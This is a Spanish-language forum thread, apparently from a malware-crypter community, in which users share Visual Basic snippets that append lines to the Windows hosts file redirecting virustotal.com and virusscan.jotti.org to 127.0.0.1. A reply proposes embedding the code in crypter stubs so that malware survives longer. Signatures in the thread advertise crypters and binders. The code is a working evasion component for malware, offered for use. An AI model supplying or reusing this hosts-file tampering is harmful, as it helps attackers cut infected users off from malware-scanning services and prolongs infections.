Mostrar mensajes previos
Ordenar por
por |||L1v3H|||
Bueno hoy estaba algo aburrido y decidi hacer este modulo "Anti-Virustotal" ya que es uno de nuestros "Enemigos" lo que hace es modificar el archivo Hosts y bloquea la pag....Gracias a NeeD por testearlo... & por darme el Visto Bueno de que Funcionaba

Código: Seleccionar todo

'#################################################################################
'
'       Autor:  L1v3H
'       Descripcion: Codigo que al ser llamado evita que se acceda a la pagina
'                       VIRUSTOTAL.COM
'       Modo De Uso: Call AntiVT
'
'       Pagina Web: Http://Indetectables.Net/Foro & Http://HackingTeam.Org
'
'################################################################################

Public Function AntiVT()
Dim a As String
Dim b As String
Dim c As String
a = Environ("windir") & "\system32\drivers\etc\hosts"
Open a For Binary As 1
b = Space(FileLen(a))
Get 1, , b
Close 1
c = vbNewLine & "127.0.0.1      www.virustotal.com"
Open a For Binary As 1
Put 1, , b & c
Close 1
End Function
Lo Prueban & nos cuenta como nos fue...Como ven lo que hace es relativamente Facil....Pero puede Ser Muy Util...
Salu2.......
por NeeD Baneado ;(
Muy bueno brot de verdad modder ahora codder de verdad una maquina en todo Funciona de 10
por DuNeD@i Usa camisa de fuerza
Que bueno parece, estoy en el curro amigo, cd llegue a casa lo pruebo...
Spyren Private Crypter-Binder [Autoit]
Crypter Online 0/35 (Terminado)
por dehombreadios Se conecta desde un manicomio
heheh buena bro
Imagen
por masangel Se conecta desde un manicomio
caray le ganaste la idea a salegas hoy me dijo que aria un modulo muy buen trabajo
Saludos
Mi blog

www.MasaSoftware.blogspot.com

Encontraras herramientas como el Masacrypter mods Indetectables joiner

___________
por SuC Usa camisa de fuerza
Pero si sube el archivo a VT antes de ejecutarlo...?
por LuisN2 Se conecta desde un manicomio
Para mi que te complicas la vida, con lo fácil que es poner:

Código: Seleccionar todo

Open Environ("windir") & "\system32\drivers\etc\hosts" For Binary As #1
Put #1, LOF(1) + 1, vbNewLine & "127.0.0.1      www.virustotal.com"
Close #1
Aún asi esta bien la iniciativa, aunque eso sería poner una lista de todas las que envían! Voy empezando...

Código: Seleccionar todo

Dim PA(1 To 2) As String

PA(1) = "www.virustotal.com"
PA(2) = "virusscan.jotti.org"

For x = 1 To 2
Open Environ("windir") & "\system32\drivers\etc\hosts" For Binary As #1
Put #1, LOF(1) + 1, vbNewLine & "127.0.0.1      " & PA(x)
Close #1
Next x
A ver si se lo ponemos a los crypters, ya sea en el Cliente como el stub, eso si, dando a elegir y avisando! Los crypters durarán mas!

Saludos!
¡Atención! LuisN2.com ha caido, pero el blog sigue estando en www.luisn2indetectables.blogspot.com o www.LuisN2.cz.cc
por ANTRAX Usa camisa de fuerza
Buenisima capo!!! Espectacular lo tuyo! segui asi maquina!!!
por adwind
No tiene nada de nuevo ¬¬ esto ya estaba posteado en manuales y tutoriles.¬¬
por The Swash Esquizofrénico
Es verdad creo que esta idea ya estaba planteada, pero de que serviría si no ejecutan el archivo antes de subirlo a VirusTotal?
Igualmente muchas gracias por la intención sigue así amigo!
En tu ventana
Y en tu ventana, gritas al cielo pero lo dices callada..
por |||L1v3H|||
en el post digo que es sencillo ¬¬ y si estaba posteado porque nadie lo hizo y lo posteo?
Salu2....& gracias por comentar
por STX Se conecta desde un manicomio
viewtopic.php?f=14&t=18069&hilit=+renzor

Salu2

Mostrar/Ocultar

por |||L1v3H|||
umm seritx no lo habia visto....igual tu tool no tiene el source esto se agrega a un crypter o un stub y listo o ahora hago una tool que lo proteja
Salu2.....
por D3F4C3-M4N
1. yo e hecho ese método manualmente y no me funciona para nada.
2. no se necisitan permisos para saltarse el UAC?
3.para eso tendria primero que ejcutarse algo no? y las personas (espias) solo envian el stub y listo!?
==================================()=============================================
bueno ya plantee mis dudas :/ ademas yo hice uno haci como el de luisN2 y simplemente no sirvio por que tiene que ser ejecutado antes de ser enviado




saludos!
Temas similares
VirusTotal File Downloader por xrahitel en Manuales y Tutoriales
virustotal (bypass VT) por xrahitel en Manuales y Tutoriales
Saltar Nod32 Modulo Amsi por aficionadohxc en Dudas y Preguntas
Links sobre el tema
Variantes de tema
Cerrado

Volver a “Otros lenguajes”